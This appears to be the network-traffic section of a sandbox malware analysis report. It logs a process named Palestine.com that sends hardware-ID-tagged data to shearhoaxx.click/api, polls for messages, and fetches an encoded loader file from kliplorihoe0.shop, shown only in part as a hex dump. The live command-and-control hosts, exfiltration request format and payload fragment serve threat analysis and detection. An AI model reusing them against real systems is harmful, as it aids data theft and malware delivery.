2024-12-23 09:35:34 UTC | 12818 | OUT | Data Raw: 2d 2d 30 58 43 4d 30 49 4e 36 57 30 30 56 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 30 58 43 4d 30 49 4e 36 57 30 30 56 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 58 43 4d 30 49 4e 36 57 30 30 56 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 30 58 43 4d 30 49 4e 36 57 30
Data Ascii: --0XCM0IN6W00VK5Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--0XCM0IN6W00VK5Content-Disposition: form-data; name="pid"2--0XCM0IN6W00VK5Content-Disposition: form-data; name="lid"Dvh8ui--888--0XCM0IN6W0
2024-12-23 09:35:35 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 09:35:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=u0u852h6m2gfecqvrhe7rqb16s; expires=Fri, 18 Apr 2025 03:22:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=siM1kNoY44WglEhZj9Y9K%2FPHBwQ0aES7TGXPReD%2F6aGHhvla8eoj1mvmcodyo6g4bgxTpIevNo6HdS8I%2BlxESKwlm1dOUGeBMtz34m93KITKI5u7z%2B2qsjmBXNqmVQ5Y5Qzy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f675cc10e8a8cdd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1793&rtt_var=702&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13754&delivery_rate=1526398&cwnd=162&unsent_bytes=0&cid=eedd6f19d3c418d7&ts=887&x=0"
2024-12-23 09:35:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 09:35:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.1649704172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:36 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KQ705QDAAMD4KJNE
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15065
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:36 UTC15065OUTData Raw: 2d 2d 4b 51 37 30 35 51 44 41 41 4d 44 34 4b 4a 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 4b 51 37 30 35 51 44 41 41 4d 44 34 4b 4a 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 51 37 30 35 51 44 41 41 4d 44 34 4b 4a 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 4b 51 37 30
                                                                                                                                                                                                                                            Data Ascii: --KQ705QDAAMD4KJNEContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--KQ705QDAAMD4KJNEContent-Disposition: form-data; name="pid"2--KQ705QDAAMD4KJNEContent-Disposition: form-data; name="lid"Dvh8ui--888--KQ70
                                                                                                                                                                                                                                            2024-12-23 09:35:37 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=msuljjk135e0o73cvo1vkt3sjn; expires=Fri, 18 Apr 2025 03:22:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLp5ar8tr%2Bwu7BOroFeprxcTW%2FLlPPFWqG9rrGe5lBEV6e8a%2FmZvxes%2FyipJgER9GwEuz%2BICLaiC%2BD2U26usqWQq9OAl6zZvg%2Fy12tQK1H%2Fb%2B0WH8YRdO0eh2FcCWEaIP%2FJ9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675ccf7db3424f-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1682&rtt_var=643&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=16003&delivery_rate=1683967&cwnd=233&unsent_bytes=0&cid=573ad9c3a2e09d84&ts=842&x=0"
2024-12-23 09:35:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 09:35:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.16
Source Port: 49705
Destination IP: 172.67.129.49
Destination Port: 443
PID: 6176
Process: C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:39 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9Y4G6U2XR1EUR4GB30P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20426
Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:39 UTC15331OUTData Raw: 2d 2d 39 59 34 47 36 55 32 58 52 31 45 55 52 34 47 42 33 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 39 59 34 47 36 55 32 58 52 31 45 55 52 34 47 42 33 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 59 34 47 36 55 32 58 52 31 45 55 52 34 47 42 33 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38
                                                                                                                                                                                                                                            Data Ascii: --9Y4G6U2XR1EUR4GB30PContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--9Y4G6U2XR1EUR4GB30PContent-Disposition: form-data; name="pid"3--9Y4G6U2XR1EUR4GB30PContent-Disposition: form-data; name="lid"Dvh8ui--88
                                                                                                                                                                                                                                            2024-12-23 09:35:39 UTC5095OUTData Raw: d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: &7~`aO`,li`M?lrQMn 64
2024-12-23 09:35:40 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=l3d6ljva64dmog21hd5dd13nf1; expires=Fri, 18 Apr 2025 03:22:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYEwSISHgjAxhf7DpZlwp4%2BgGxEmS6gAcNCnDstco0Hh71DFUFik7sWM0cRSqC1jhTEDinCLq6qOj8mSd3Vz8BHXplHDb0eJ3evfy0rND1OR7a6BaI1QgmJZ5zcY%2Bm%2F22M7B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675cdebd80c33b-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1539&min_rtt=1501&rtt_var=590&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21389&delivery_rate=1945369&cwnd=171&unsent_bytes=0&cid=25e33a714cff89d4&ts=941&x=0"
2024-12-23 09:35:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 09:35:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5
Source IP: 192.168.2.16
Source Port: 49706
Destination IP: 172.67.129.49
Destination Port: 443
PID: 6176
Process: C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:41 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=X73TKVFD5WM1B2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1210
Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:41 UTC1210OUTData Raw: 2d 2d 58 37 33 54 4b 56 46 44 35 57 4d 31 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 58 37 33 54 4b 56 46 44 35 57 4d 31 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 37 33 54 4b 56 46 44 35 57 4d 31 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 58 37 33 54 4b 56 46 44 35 57
                                                                                                                                                                                                                                            Data Ascii: --X73TKVFD5WM1B2Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--X73TKVFD5WM1B2Content-Disposition: form-data; name="pid"1--X73TKVFD5WM1B2Content-Disposition: form-data; name="lid"Dvh8ui--888--X73TKVFD5W
2024-12-23 09:35:42 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=m5uskpkljlen35dpri3i0sb3g5; expires=Fri, 18 Apr 2025 03:22:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0RBH%2Bl%2FpaUzBmB7mZUzAA9%2Fj9Rp6A6vytH38c9EZmhw5eyE8Qy8kfuxIzjFNAPcKQcrwqDS6axL4gBwugjSBhIsvxqgxq5%2FYqhmfQYa6nRoZm0itvctuebZDmGbTwLgDqLU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675ced9c700f51-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1486&rtt_var=575&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2123&delivery_rate=1872995&cwnd=204&unsent_bytes=0&cid=89bca8696cfde6ad&ts=819&x=0"
2024-12-23 09:35:42 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 09:35:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.16
Source Port: 49707
Destination IP: 172.67.129.49
Destination Port: 443
PID: 6176
Process: C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:44 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=V7UNCIOLTQBFB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 57845
Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:44 UTC15331OUTData Raw: 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42
                                                                                                                                                                                                                                            Data Ascii: --V7UNCIOLTQBFBContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--V7UNCIOLTQBFBContent-Disposition: form-data; name="pid"1--V7UNCIOLTQBFBContent-Disposition: form-data; name="lid"Dvh8ui--888--V7UNCIOLTQBFB
2024-12-23 09:35:46 UTC | 1130 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 09:35:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=h3q26sriaetta0qlk47a44oc91; expires=Fri, 18 Apr 2025 03:22:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQQp4pdPJVu%2Fvj8qUGmB3FCeWZ96ZWlspT1Azs9z9hjFfIi8uwGHgL%2FTDIyssA55KEnBmTfhRhQwC9EUxu8jLHj%2Fm6YPqktRdsg8UAxh4zK1gVLZ5U4u5TVy%2FqSj%2BKHbjuLk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f675d008d4a0f9d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1469&rtt_var=572&sent=31&recv=63&lost=0&retrans=0&sent_bytes=2841&recv_bytes=58912&delivery_rate=1877813&cwnd=193&unsent_bytes=0&cid=a0a45cb37c1232aa&ts=1665&x=0"
2024-12-23 09:35:46 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 09:35:46 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.16 | 49708 | 172.67.129.49 | 443 | 6176 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:47 UTC | 264 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: shearhoaxx.click
2024-12-23 09:35:47 UTC | 80 bytes | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d 26 68 77 69 64 3d 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45
Data Ascii: act=get_message&ver=4.0&lid=Dvh8ui--888&j=&hwid=6E31A45A7B5F2CA1C8BA21E021A8AA6E
2024-12-23 09:35:48 UTC | 1126 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 09:35:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=e70mmh0u39llni4vdb0rle07nb; expires=Fri, 18 Apr 2025 03:22:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PsQHmYuQpQyGW0UmzCJga0J%2FfW9g1SqTUa3tLv13C9650b0jVPxlb9kGqySX3%2B9ZznVrvGDDdq2nD5GjQyJKCvDgtbKYf%2Bv3aYQ%2FdTRa%2B2SpCqHdAxf7O0bVIxbYNspQJQDi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f675d135bcf4262-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1686&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=980&delivery_rate=1659090&cwnd=190&unsent_bytes=0&cid=1bed83e772de2a25&ts=1064&x=0"
2024-12-23 09:35:48 UTC | 230 bytes | IN | Data Raw: 65 30 0d 0a 6a 6a 43 6d 4d 66 61 2b 55 73 31 32 38 4b 72 42 31 58 69 49 70 43 42 6e 49 4b 6c 38 68 51 49 31 43 45 46 4c 4e 66 47 36 65 51 7a 56 53 34 52 45 31 49 52 77 70 51 4b 45 32 72 4c 76 4a 4b 66 34 44 77 78 4d 77 41 7a 70 62 55 64 68 4b 53 52 51 77 5a 51 4b 5a 4f 46 41 2b 68 36 66 30 43 61 53 46 5a 7a 61 6e 72 6b 63 2b 76 74 51 42 6b 36 48 43 50 31 32 46 79 52 6a 4c 55 48 54 67 45 73 67 72 46 57 45 43 38 66 44 66 72 5a 55 68 59 6a 37 39 78 44 38 30 46 41 55 47 76 56 54 32 53 31 47 5a 43 34 2f 51 70 44 55 48 69 4c 74 58 38 74 74 32 64 67 37 6f 52 4f 73 68 5a 47 30 46 75 66 57 51 51 4e 50 68 78 6e 39 5a 78 63 6b 59 79 31 42 30 34 42 4a 49 4b 78 56 68 41 76 47 77 77 38 3d 0d 0a
Data Ascii: e0jjCmMfa+Us128KrB1XiIpCBnIKl8hQI1CEFLNfG6eQzVS4RE1IRwpQKE2rLvJKf4DwxMwAzpbUdhKSRQwZQKZOFA+h6f0CaSFZzanrkc+vtQBk6HCP12FyRjLUHTgEsgrFWEC8fDfrZUhYj79xD80FAUGvVT2S1GZC4/QpDUHiLtX8tt2dg7oROshZG0FufWQQNPhxn9ZxckYy1B04BJIKxVhAvGww8=
2024-12-23 09:35:48 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.16 | 49709 | 172.67.182.135 | 443 | 6176 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:50 UTC | 211 bytes | OUT | GET /int_clp_ldr_pan.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: kliplorihoe0.shop
2024-12-23 09:35:50 UTC | 905 bytes | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 09:35:50 GMT
Content-Type: text/plain
Content-Length: 10013
Connection: close
Accept-Ranges: bytes
ETag: "7097d81386f596e08a7df136f7b5b3c3"
Last-Modified: Wed, 11 Dec 2024 21:20:51 GMT
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THhImfkj08yVbskTEhPU6fCXZ7OijozVjxCcNJrmDKPfrCsZ6SlLdNpJzxQ7I6niyo0L19NblXdDUCA95DqidaowZ0ogD8lpFutDL%2Bt8Ig0ywnbhc%2Bb3w9IRJb3JSiwxlOeM8g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f675d235840c345-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1558&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=825&delivery_rate=1819314&cwnd=178&unsent_bytes=0&cid=08c07a115f9782b9&ts=607&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC1369INData Raw: 41 4f 67 42 30 41 45 55 41 51 67 42 56 41 47 30 41 62 51 41 6e 41 43 73 41 4a 77 42 77 41 48 30 41 4c 41 41 67 41 44 59 41 55 77 42 32 41 45 51 41 65 51 42 46 41 48 55 41 62 67 42 70 41 43 63 41 4b 77 41 6e 41 48 45 41 64 51 42 6c 41 45 59 41 62 77 42 73 41 47 51 41 5a 51 42 79 41 45 34 41 59 51 42 74 41 43 63 41 4b 77 41 6e 41 47 55 41 4c 67 42 36 41 47 6b 41 63 41 41 32 41 46 4d 41 64 67 41 70 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 43 41 41 49 41 41 6f 41 43 41 41 49 41 42 6e 41 45 4d 41 61 51 41 67 41 43 67 41 4e 67 42 54 41 48 59 41 64 67 42 42 41 44 59 41 55 77 42 32 41 43 73 41 4e 67 42 54 41 48 59 41 63 67 41 32 41 46 4d 41 64 67 41 72 41 44 59 41 55 77 42 32 41 47 6b 41 51 51 42 69 41 47 77 41 5a 51 41 36 41 46 55 41 59 67 41 79 41 45
